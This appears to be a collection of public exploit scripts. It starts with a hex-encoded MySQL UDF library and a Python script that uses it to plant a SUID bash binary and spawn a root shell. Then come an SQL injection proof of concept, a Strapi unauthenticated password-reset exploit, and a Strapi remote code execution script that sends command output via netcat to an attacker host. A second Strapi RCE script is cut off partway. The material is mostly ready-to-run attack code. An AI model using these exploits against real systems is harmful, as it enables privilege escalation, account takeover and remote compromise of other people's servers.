0000120000000100000000000000000000002000000025000000000000000000000020000000ed000000000000007e02000012000000ab01000000000000150100001200000079010000000000007d00000012000000c700000000000000c600000012000000f50000000000000071010000120000009e01000000000000fb00000012000000cf00000000000000700000001200000010010000000000002500000012000000e0000000000000008901000012000000b500000000000000a80200001200000016000000000000000b0100002200000088010000000000007400000012000000fb00000000000000230000001200000080010000040d00006100000012000b00750000003b0a00000500000012000b0010000000f80d00000000000012000c003f010000a10c00002500000012000b001f010000100900000000000012000900c301000008110000000000001000f1ff96000000470a00000500000012000b0070010000ee0c00001600000012000b00cf01000010110000000000001000f1ff56000000310a00000500000012000b00020100009c0b00003000000012000b00a30100007d0d00003e00000012000b00390000002c0a00000500000012000b00320100006b0c00003600000012000b00bc01000008110000000000001000f1ff65000000360a00000500000012000b0025010000fc0b00006f00000012000b0085000000400a00000700000012000b0017010000cc0b00003000000012000b0055010000c60c00002800000012000b00a90000004c0a00008800000012000b008f010000650d00001800000012000b00d7000000d40a0000c800000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000474c4942435f322e310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300b20100001000000000000000731f690900000400d4010000100000001069690d00000300e0010000100000001169690d00000200ea01000000000000040b000008000000b70b000008000000e70b000008000000110c000008000000220c000008000000550c0000080000008e0c000008000000ac0c000008000000d90c00000800000004110000080000006b0a0000020f00007c0a000002030000960a000002020000ad0a000002090000430b000002090000bc0a0000020c0000e40a0000020e0000f30a0000020e00003f0c0000020e00000e0b000002010000310b000002060000560b0000020a0000680b000002120000bf0b0000020d0000ef0b0000020d00005b0c0000020d0000960c0000020d0000b20c0000020d0000e10c0000020d0000fd0c000002080000580d000002110000770d0000020b00008e0d000002070000e410000006040000e810000006050000ec10000006100000fc1000000704000000110000071000005589e55383ec04e8000000005b81c3d40700008b93f4ffffff85d27405e81e000000e8b9000000e884040000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff5589e55653e8ad00000081c37607000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8bcffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c3f706000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35531c089e55dc35589e55dc35589e557565383ec0cfc83c9ff8b750c8b46088b3831c0f2aef7d18d59ffe8fcffffff83f8007c53753f83ec0c6a1ee8fcffffff5f596a006a00486a218d1418f7d06a0721d0506a00e8fcffffff83c42083f8ff89c7742351538b4608ff3057e8fcffffffffd7eb0b526a016a0050e8fcffffff31c083c410eb05b8010000008d65f45b5e5f5dc35589e557565383ec18fc6800040000e8fcffffffc70424010000008945e8e8fcffffffc6000089c68b450c595b31db68840e00008b4008ff30e8fcffffff8945eceb338b7de831c083c9fff2ae5252f7d18d79ff8d043b50568945f0e8fcffffff83c40c57ff75e889c68d041850e8fcffffff8b5df083c40cff75ec6a04ff75e8e8fcffffff83c41085c075b683ec0cff75ece8fcffffff83c410803e0075088b4518c60001eb16c6441eff0031c083c9ff89f7f2ae8b4514f7d14989088d65f489f05b5e5f5dc35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e55383ec048b550c8b5d10833a0274095050683f0e0000eb428b420483380074095050685e0e0000eb318b520c83ec0cc74004000000008b0283c00203420450e8fcffffff8b550883c41089420c31d285c07512505068860e000053e8fcffffffb20183c41088d08b5dfcc9c35589e583ec088b450c83380175128b4004833800750a8b4508c6000131c0eb14505068140e0000ff7510e8fcffffffb00183c410c9c35589e55383ec0c8b5d1068a00e000053e8fcffffff8b4514c7001e00000089d88b5dfcc9c35531d289e583ec088b450c8338007414525268bf0e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec148b450c8b4008ff30e8fcffffffc999c35589e557565383ec10fc8b550c8b45088b580c8b420c89df8b088d440b018945e88b42088b30f3a48b420c8b00c60403008b42088b4a0c8b7de88b70048b4904f3a48b420c8b55e88b4004c60402006a015253e8fcffffff8d65f45b5e5f5d99c35589e58b45088b400c85c074098945085de9fcffffff5dc35589e55783ec10fc8b450c8b4008ff30e8fcffffff83c41085c089c275088b4518c60001eb1131c083c9ff89d7f2ae8b4514f7d149890889d08b7dfcc9c390909090905589e55653e85dfcffff81c3260300008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c3ec020000e860fbffff595bc9c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000b20100000c000000100900000d000000f80d000004000000b4000000f5feff6ff8010000050000005805000006000000b80200000a000000f40100000b0000001000000003000000f010000002000000100000001400000011000000170000000009000011000000e0070000120000002001000013000000080000001600000000000000feffff6fa0070000ffffff6f01000000f0ffff6f4c070000faffff6f0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000141000000000000000000000560900006609000004110000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000b4000000b400000044010000030000000000000004000000040000000b000000f6ffff6f02000000f8010000f8010000c000000003000000000000000400000004000000150000000b00000002000000b8020000b8020000a0020000040000000100000004000000100000001d00000003000000020000005805000058050000f40100000000000000000000010000000000000025000000ffffff6f020000004c0700004c070000540000000300000000000000020000000200000032000000feffff6f02000000a0070000a00700004000000004000000010000000400000000000000410000000900000002000000e0070000e007000020010000030000000000000004000000080000004a0000000900000002000000000900000009000010000000030000000a0000000400000008000000530000000100000006000000100900001009000030000000000000000000000004000000000000004e000000010000000600000040090000400900003000000000000000000000000400000004000000590000000100000006000000700900007009000088040000000000000000000010000000000000005f0000000100000006000000f80d0000f80d00001c00000000000000000000000400000000000000650000000100000032000000140e0000140e0000dd000000000000000000000001000000010000006d0000000100000002000000f40e0000f40e00000400000000000000000000000400000000000000770000000100000003000000001000000010000008000000000000000000000004000000000000007e000000010000000300000008100000081000000800000000000000000000000400000000000000850000000100000003000000101000001010000004000000000000000000000004000000000000008a00000006000000030000001410000014100000d000000004000000000000000400000008000000930000000100000003000000e4100000e41000000c00000000000000000000000400000004000000980000000100000003000000f0100000f01000001400000000000000000000000400000004000000a1000000010000000300000004110000041100000400000000000000000000000400000000000000a7000000080000000300000008110000081100000800000000000000000000000400000000000000ac000000010000000000000000000000081100009b0000000000000000000000010000000000000001000000030000000000000000000000a3110000b500000000000000000000000100000000000000"; shellcode_x64 = "7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000"; shellcode = shellcode_x32 if (platform.architecture()[0] == '64bit'): shellcode = shellcode_x64 # MySQL username and password: make sure you have FILE privileges and mysql is actually running as root # username='root' # password='' ### #if len(sys.argv) != 2: # print "Usage: %s <username> <password>" % argv[0] #username=sys.argv[1]; #password=sys.argv[2]; ### parser = argparse.ArgumentParser() parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True) parser.add_argument('--password', '-p', help='MySQL password', type=str) args = parser.parse_args() username=args.username password=args.password if not password: password='' cmd='mysql -u root -p\'' + password + '\' -e "select @@plugin_dir \G"' plugin_str = subprocess.check_output(cmd, shell=True) plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str) res = bool(plugin_dir) if not res: print("Error: could not locate the plugin directory") os.exit(1); plugin_dir_ = plugin_dir.group(1) print("Plugin dir is %s" % plugin_dir_) # file to save the udf so file to udf_filename = 'udf' + str(random.randint(1000,10000)) + '.so' udf_outfile = plugin_dir_ + udf_filename # alternative way: # set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir; print("Trying to create a udf library..."); os.system('mysql -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'%s\' \G"' % udf_outfile) res = os.path.isfile(udf_outfile) if not res: print("Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile) os.exit(1); print("UDF library created successfully: %s" % udf_outfile); print("Trying to create sys_exec...") os.system('mysql -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\'\G"' % udf_filename) print("Checking if sys_exec was created...") cmd='mysql -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"'; res = subprocess.check_output(cmd, shell=True); if (res == ''): print("sys_exec was not found (good luck next time!)") if res: print("sys_exec was found: %s" % res) print("Generating a SUID binary in /var/www/bash...") os.system('mysql -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/bash /var/www/bash && chmod +s /var/www/bash\')"') print("Trying to spawn a root shell...") os.system("cd /var/www && ./bash -p")

# Exploit Title: Bus Pass Management System 1.0 - 'viewid' SQL Injection # Date: 2021-08-28 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Windows 10 - Wamp Server # Vulnerable page : http://localhost/buspassms/admin/view-pass-detail.php?viewid= # Vulnerable paramater : The viewid paramater is Vulnerable to sqli # Proof Of Concept : # 1 . Download And install [ bus-pass-management-system ] # 2 . Go to /admin/index.php and Enter Username & Password # 3 . Navigate to passes >> manage pass # 4 . Click on the view and enter the sql payload into the Url Use : http://localhost/buspassms/admin/view-pass-detail.php?viewid=1'[Sql Payload]

# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated) # Date: 2021-08-29 # Exploit Author: David Anglada [CodiObert] # Vendor Homepage: https://strapi.io/ # Version: 3.0.0-beta # Tested on: Linux # CVE: CVE-2019-18818 #!/usr/bin/python import requests import sys import json userEmail = "[email protected]" strapiUrl = "http://strapi.url" newPassword = "codiobert" s = requests.Session() # Get strapi version strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text) print("[*] strapi version: {}".format(strapiVersion["strapiVersion"])) # Validate vulnerable version if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'): # Password reset print("[*] Password reset for user: {}".format(userEmail)) resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)} s.post("{}/".format(strapiUrl), json=resetPasswordReq) # Set new password print("[*] Setting new password") exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword} r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit) # Check if the password has changed if "username" in str(r.content): print("[+] New password '{}' set for user {}".format(newPassword, userEmail)) else: print("\033[91m[-] Something went wrong\033[0m") sys.exit(1) else: print("\033[91m[-] This version is not vulnerable\033[0m") sys.exit(1)

# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) # Date: 29/08/2021 # Exploit Author: David Utón (M3n0sD0n4ld) # Vendor Homepage: https://strapi.io/ # Affected Version: strapi-3.0.0-beta.17.7 and earlier # Tested on: Linux Ubuntu 18.04.5 LTS # CVE : CVE-2019-19609 #!/usr/bin/python3 # Author: @David_Uton (m3n0sd0n4ld) # Github: https://m3n0sd0n4ld.github.io # Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST import requests, sys, os, socket logoType = (''' ===================================== CVE-2019-19609 - Strapi RCE ------------------------------------- @David_Uton (M3n0sD0n4ld) https://m3n0sd0n4ld.github.io/ ===================================== ''') if __name__ == '__main__': # Parameter checking if len(sys.argv) != 5: print(logoType) print("[!] Some of these parameters are missing.") print(''' Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0]) # Exploit run else: # Paremeters url = sys.argv[1] token = sys.argv[2] command = sys.argv[3] lhost = sys.argv[4] lport = 9999 s = requests.session() r = s.post(url, verify=False) # SSL == verify=True headersData = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Authorization': "Bearer %s" % token } postData = { "plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport) } print(logoType) os.system("nc -nvlp 9999 &") try: print("[+] Successful operation!!!") r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True # Content print print(r.text) except: print("[!] An error occurred, try again.") sys.exit(1)

# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) # Date: 2021-08-30 # Exploit Author: Musyoka Ian # Vendor Homepage: https://strapi.io/ # Software Link: https://strapi.io/ # Version: Strapi CMS version 3.0.0-beta.17.4 or lower # Tested on: Ubuntu 20.04 # CVE : CVE-2019-18818, CVE-2019-19609 #!/usr/bin/env python3 import requests import json from cmd import Cmd import sys if len(sys.argv) != 2: print("[-] Wrong number of arguments provided") print("[*] Usage: python3 exploit.py <URL>\n") sys.exit() class Terminal(Cmd): prompt = "$> " def default(self, args): code_exec(args) def check_version(): global url print("[+] Checking Strapi CMS Version running") version = requests.get(f"{url}/admin/init").text version = json.loads(version) version = version["data"]["strapiVersion"] if version == "3.0.0-beta.17.4": print("[+] Seems like the exploit will work!!!\n[+] Executing exploit\n\n") else: print("[-] Version mismatch trying the exploit anyway") def password_reset(): global url, jwt session = requests.session() params = {"code" : {"$gt":0}, "password" : "SuperStrongPassword1", "passwordConfirmation" : "SuperStrongPassword1" } output = session.post(f"{url}/admin/auth/reset-password", json = params).text response = json.loads(output) jwt = response["jwt"] username = response["user"]["username"] email = response["user"]["email"] if "jwt" not in output: print("[-] Password reset unsuccessfull\n[-] Exiting now\n\n") sys.exit(1) else: print(f"[+] Password reset was successfully\n[+] Your email is: {email}\n[+] Your new credentials are: {username}:SuperStrongPassword1\n[+] Your authenticated JSON Web Token: 